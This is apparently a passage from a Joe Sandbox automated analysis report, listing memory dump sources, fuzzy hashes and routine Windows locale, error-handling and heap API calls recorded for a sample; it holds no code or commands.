                                                                        • Associated: 00000000.00000002.2279071566.0000000000BE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279089498.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279145817.0000000000BEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279162447.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279218738.0000000000BF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorLast$EnumLocalesSystem
                                                                        • String ID:
                                                                        • API String ID: 2417226690-0
                                                                        • Opcode ID: 8fbe35998f4038c2e88274503572da14dac451ba48025407efbdb7e34103327b
                                                                        • Instruction ID: 6ffd42f32e4b928a029a2066008f829bdd3dcba9503a2bad2c6d8e4c81d8612e
                                                                        • Opcode Fuzzy Hash: 8fbe35998f4038c2e88274503572da14dac451ba48025407efbdb7e34103327b
                                                                        • Instruction Fuzzy Hash: 62F0C2363003046FDB289F359882A7AFBD1FF81368B1545AEF9458B790E7B1AC42CA50
                                                                        APIs
                                                                          • Part of subcall function 00BCA611: EnterCriticalSection.KERNEL32(-00BF0B70,?,00BC9B58,00BABEE0,00BED238,0000000C,00BC990C,C0C2D04E), ref: 00BCA620
                                                                        • EnumSystemLocalesW.KERNEL32(00BD0952,00000001,00BED668,0000000C,00BD0360,-00000050), ref: 00BD0997
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2279043918.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                        • Associated: 00000000.00000002.2279023228.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279071566.0000000000BE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279089498.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279145817.0000000000BEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279162447.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279218738.0000000000BF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                        • String ID:
                                                                        • API String ID: 1272433827-0
                                                                        • Opcode ID: 0a6c100badd36a747b7bbf5954936568c17159bd82e7bca708ed4af4a2e7f00b
                                                                        • Instruction ID: 993308ae13eda9c513f95783082d46b236a367f8f9b7353039d6a4e09ce610b4
                                                                        • Opcode Fuzzy Hash: 0a6c100badd36a747b7bbf5954936568c17159bd82e7bca708ed4af4a2e7f00b
                                                                        • Instruction Fuzzy Hash: A1F04F36A50204DFD700EF69D852B5C7BF0EB45721F10456AF414DB2A1DBB59900CF41
                                                                        APIs
                                                                          • Part of subcall function 00BCF9CB: GetLastError.KERNEL32(00000000,?,00BD1D01), ref: 00BCF9CF
                                                                          • Part of subcall function 00BCF9CB: SetLastError.KERNEL32(00000000,?,?,00000028,00BCA98F), ref: 00BCFA71
                                                                        • EnumSystemLocalesW.KERNEL32(00BD4FE4,00000001,?,?,?,00BD4A24,-00000050,-00000002,00000000,?,00000055,?,-00000050,?,?,?), ref: 00BD4FD0
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2279043918.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                        • Associated: 00000000.00000002.2279023228.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279071566.0000000000BE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279089498.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279145817.0000000000BEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279162447.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279218738.0000000000BF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorLast$EnumLocalesSystem
                                                                        • String ID:
                                                                        • API String ID: 2417226690-0
                                                                        • Opcode ID: 52d1c9a6826c75d0ac3c520114412f4a78a8ebb4b787dda2334eebf6fd62a725
                                                                        • Instruction ID: 6664a732a4a2bd57591bd65930b9912caacc539eced4108c0efcc78e0c31b820
                                                                        • Opcode Fuzzy Hash: 52d1c9a6826c75d0ac3c520114412f4a78a8ebb4b787dda2334eebf6fd62a725
                                                                        • Instruction Fuzzy Hash: 22F0E53A30024557CB049F35D846B6ABFD4EFC2755B0640AEFA098B260D771A843CB90
                                                                        APIs
                                                                        • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,00000000,?,00BC9343,?,20001004,00000000,00000002,?,?,00BC8255), ref: 00BD0498
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2279043918.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                        • Associated: 00000000.00000002.2279023228.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279071566.0000000000BE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279089498.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279145817.0000000000BEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279162447.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279218738.0000000000BF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: InfoLocale
                                                                        • String ID:
                                                                        • API String ID: 2299586839-0
                                                                        • Opcode ID: 2206f5f6eb5df714c33fab10eb6d82899765715d9e290c97d13bc1753cb1e259
                                                                        • Instruction ID: 8af7e57a6abe53100e9e5c11e3cc12deca48211bd28b579ad0f9f74a02bb1a87
                                                                        • Opcode Fuzzy Hash: 2206f5f6eb5df714c33fab10eb6d82899765715d9e290c97d13bc1753cb1e259
                                                                        • Instruction Fuzzy Hash: 72E01A32551218BBCB123F61EC05FAEBEAAEB44750F004062FD0566360DF728921AAD5
                                                                        APIs
                                                                        • SetUnhandledExceptionFilter.KERNEL32(Function_00020E59), ref: 00BC0D37
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2279043918.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                        • Associated: 00000000.00000002.2279023228.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279071566.0000000000BE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279089498.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279145817.0000000000BEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279162447.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279218738.0000000000BF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: ExceptionFilterUnhandled
                                                                        • String ID:
                                                                        • API String ID: 3192549508-0
                                                                        • Opcode ID: f60c3a2ccbee6c3a389d50e1228f380b5f87792fa968088fae546433de64753f
                                                                        • Instruction ID: 4cafebadd57f9474f942d0683b1a313bf708e5509aff24ca68d87669a77fe1cd
                                                                        • Opcode Fuzzy Hash: f60c3a2ccbee6c3a389d50e1228f380b5f87792fa968088fae546433de64753f
                                                                        • Instruction Fuzzy Hash:
                                                                        Strings
                                                                        • invalid string position, xrefs: 00BB75E0
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2279043918.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                        • Associated: 00000000.00000002.2279023228.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279071566.0000000000BE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279089498.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279145817.0000000000BEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279162447.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279218738.0000000000BF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: invalid string position
                                                                        • API String ID: 0-1799206989
                                                                        • Opcode ID: 921470259ae8fa12115986be5bb7d73af320d56de9143480dfd6705a086d20e1
                                                                        • Instruction ID: 2dc28afdcf246e014314338bb62e06528819eb30cd2000869a6d3791752c7384
                                                                        • Opcode Fuzzy Hash: 921470259ae8fa12115986be5bb7d73af320d56de9143480dfd6705a086d20e1
                                                                        • Instruction Fuzzy Hash: A841667BF555101FEB08843588BA7FB1BC787F2354F1EA46F484A87262CCAB480F1A90
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2279043918.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                        • Associated: 00000000.00000002.2279023228.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279071566.0000000000BE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279089498.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279145817.0000000000BEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279162447.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279218738.0000000000BF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: HeapProcess
                                                                        • String ID:
                                                                        • API String ID: 54951025-0
                                                                        • Opcode ID: 57d094fa3121fdaf11e95a6f94ff27b8415f7fce935e8299c318a35d5dd89fec
                                                                        • Instruction ID: 7fcc5e497c531436875e0bdf4aadf954e718570da8da506948a2ca8103062d3c
                                                                        • Opcode Fuzzy Hash: 57d094fa3121fdaf11e95a6f94ff27b8415f7fce935e8299c318a35d5dd89fec
                                                                        • Instruction Fuzzy Hash: C8A011302002008F83008F32AA0A2083AE8BA002803008028A000CB230EF20E2028F80
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2279043918.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                        • Associated: 00000000.00000002.2279023228.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279071566.0000000000BE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279089498.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279145817.0000000000BEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279162447.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279218738.0000000000BF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 3e35b181bdf6232fbcda1b298db775060e6f4c126ddf667051e745c61f2529c3
                                                                        • Instruction ID: 98632182f95b2c08b874a2df348c69fa74277da0abf197d66e8ddb1e87955fd6
                                                                        • Opcode Fuzzy Hash: 3e35b181bdf6232fbcda1b298db775060e6f4c126ddf667051e745c61f2529c3
                                                                        • Instruction Fuzzy Hash: 2352797BF69A100BA70CC97A9C923EBA6C397C8315F1ED43E985AD3245EDBCCC064244
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2279043918.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                        • Associated: 00000000.00000002.2279023228.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279071566.0000000000BE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279089498.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279145817.0000000000BEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279162447.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279218738.0000000000BF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 5685d08649ea137842273a06d08b908df35954e99729d6404ca99fc826444739
                                                                        • Instruction ID: 4175706da52cd886d0c954f0c442f642488a58c4abc4ff16bb310911d3f515b1
                                                                        • Opcode Fuzzy Hash: 5685d08649ea137842273a06d08b908df35954e99729d6404ca99fc826444739
                                                                        • Instruction Fuzzy Hash: C232F621D25F418DD7235634C8A2336A78DAFB73C5F15D72BF82ABA9A5EF29C4834100
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2279043918.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                        • Associated: 00000000.00000002.2279023228.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279071566.0000000000BE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279089498.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279145817.0000000000BEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279162447.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279218738.0000000000BF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 2c3373d3d63aafeed9efae2f92305ea8d98987a4e32e46f807e1b04da27e68c5
                                                                        • Instruction ID: 4659dab65106af31ab8918391107a2d980a9470b0a7e3a1cc4c4f5f224e7604d
                                                                        • Opcode Fuzzy Hash: 2c3373d3d63aafeed9efae2f92305ea8d98987a4e32e46f807e1b04da27e68c5
                                                                        • Instruction Fuzzy Hash: DA027B3BA546004FDB08C939C4D53FB7BD3DBD5314F19A46E998987361E9BB8C098B41
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2279043918.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                        • Associated: 00000000.00000002.2279023228.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279071566.0000000000BE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279089498.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279145817.0000000000BEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279162447.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279218738.0000000000BF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 6c09c0ec06b3f9d8869bb114437d2dc3033326d6f360c37f9b1d979308c42411
                                                                        • Instruction ID: e461777f4f1eab23563006eefa3c9869d27487e95af9ed39359c1bb07c82b419
                                                                        • Opcode Fuzzy Hash: 6c09c0ec06b3f9d8869bb114437d2dc3033326d6f360c37f9b1d979308c42411
                                                                        • Instruction Fuzzy Hash: F902567BB64A100BE708C929C8E23FB76C39BD5314F1ED8799859C7295ED7ECC094680
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2279043918.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                        • Associated: 00000000.00000002.2279023228.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279071566.0000000000BE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279089498.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279145817.0000000000BEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279162447.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279218738.0000000000BF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 19e87395f239bc1c3ec62e6324478c5a8273a04f7963ab837c80d666cca6b598
                                                                        • Instruction ID: a8e554972fa35e41a6e8bbaaebc9d86980b9894f298e88ccc3bf40067179709d
                                                                        • Opcode Fuzzy Hash: 19e87395f239bc1c3ec62e6324478c5a8273a04f7963ab837c80d666cca6b598
                                                                        • Instruction Fuzzy Hash: A9E14C3A7502105FEF044539C0F93EB2BC647E2354F1AE87A98D9C73A2D86B844E9F51
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2279043918.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                        • Associated: 00000000.00000002.2279023228.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279071566.0000000000BE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279089498.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279145817.0000000000BEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279162447.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279218738.0000000000BF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 9a98a54fa4954631f3fb6b3743a75a3e0176c9fb87243fc0313cefb139676b99
                                                                        • Instruction ID: b7e7ebf388b163cff5dfd0e9a30ea8ac989431302c9631cf9d7cd990fd198773
                                                                        • Opcode Fuzzy Hash: 9a98a54fa4954631f3fb6b3743a75a3e0176c9fb87243fc0313cefb139676b99
                                                                        • Instruction Fuzzy Hash: 3DF15A367592014FDB44C938C4D93EB77D29B9B304F19986AD849CB352DA2BC84EDF22
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2279043918.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                        • Associated: 00000000.00000002.2279023228.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279071566.0000000000BE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279089498.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279145817.0000000000BEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279162447.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279218738.0000000000BF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 6bdedb2ba3e196d8df56ec011cd9c017757d2474eeab606d1672e2f6a7145cf7
                                                                        • Instruction ID: d5255b68f881bd887c20cd2cf29c71ac6b9eb8ee36a5b52f94212d7e9726ee24
                                                                        • Opcode Fuzzy Hash: 6bdedb2ba3e196d8df56ec011cd9c017757d2474eeab606d1672e2f6a7145cf7
                                                                        • Instruction Fuzzy Hash: E3E16C77A1C3108FC714CE29C8D52AFB7E2ABD9310F5A486DE89AD7311DA75DC048B92
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2279043918.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                        • Associated: 00000000.00000002.2279023228.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279071566.0000000000BE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279089498.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279145817.0000000000BEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279162447.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279218738.0000000000BF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 41aa7e09c1ea49c0902b61535e3d5a4a47d2b090cd3eb169f9235c2670e27eed
                                                                        • Instruction ID: 2bc762db0d2be13ea25fa9b79069769bbf8c2d6aeeb6d4f50d359bfc67ac3e64
                                                                        • Opcode Fuzzy Hash: 41aa7e09c1ea49c0902b61535e3d5a4a47d2b090cd3eb169f9235c2670e27eed
                                                                        • Instruction Fuzzy Hash: 87E14A76A183048FC718CE69C4D16BEBBE2ABC8314F19446DF999D7351DBB5DC008B92
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2279043918.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                        • Associated: 00000000.00000002.2279023228.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279071566.0000000000BE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279089498.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279145817.0000000000BEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279162447.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279218738.0000000000BF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: b849e714519dd208294644d1af3b014baceba7ba96a3300f3e0e068169bbf5a4
                                                                        • Instruction ID: a574ea94423ea9cc3442cab74a867962ca95e1760f8dcb066d7d65827311b0f4
                                                                        • Opcode Fuzzy Hash: b849e714519dd208294644d1af3b014baceba7ba96a3300f3e0e068169bbf5a4
                                                                        • Instruction Fuzzy Hash: 52C1C075A4C3049FC714DE28C880A7EB7E1EBC9704F54896DF885D7351EAB1DD448BA2
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2279043918.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                        • Associated: 00000000.00000002.2279023228.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279071566.0000000000BE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279089498.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279145817.0000000000BEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279162447.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279218738.0000000000BF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 65d3e852bd20f6b5a113d24d014fd73d7a1f498ee018386e966316f875211415
                                                                        • Instruction ID: cb3a78947d01876a45368a2a9067b6ed1bb03aa5f316021ade93e1865c3f3512
                                                                        • Opcode Fuzzy Hash: 65d3e852bd20f6b5a113d24d014fd73d7a1f498ee018386e966316f875211415
                                                                        • Instruction Fuzzy Hash: 7DC1C0709486468FCB28CF68C484F7ABBF1EF45310F18469DE892AB691CB31AD46CF50
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2279043918.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                        • Associated: 00000000.00000002.2279023228.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279071566.0000000000BE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279089498.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279145817.0000000000BEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279162447.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279218738.0000000000BF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: e6181ee7459a766b2a7ebb79cf07fc8ca235d8d1f9c8874baba3476e7e308c16
                                                                        • Instruction ID: c4acd06cfd3f5c8c656a7b04d8d9e836e76305cd51b61f80d783dac33dbca469
                                                                        • Opcode Fuzzy Hash: e6181ee7459a766b2a7ebb79cf07fc8ca235d8d1f9c8874baba3476e7e308c16
                                                                        • Instruction Fuzzy Hash: 2A91703B7455014BEB0C853988E93EB33C38BD6354F39A469D949CB391DD2BCC4A9B12
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2279043918.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                        • Associated: 00000000.00000002.2279023228.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279071566.0000000000BE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279089498.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279145817.0000000000BEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279162447.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279218738.0000000000BF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
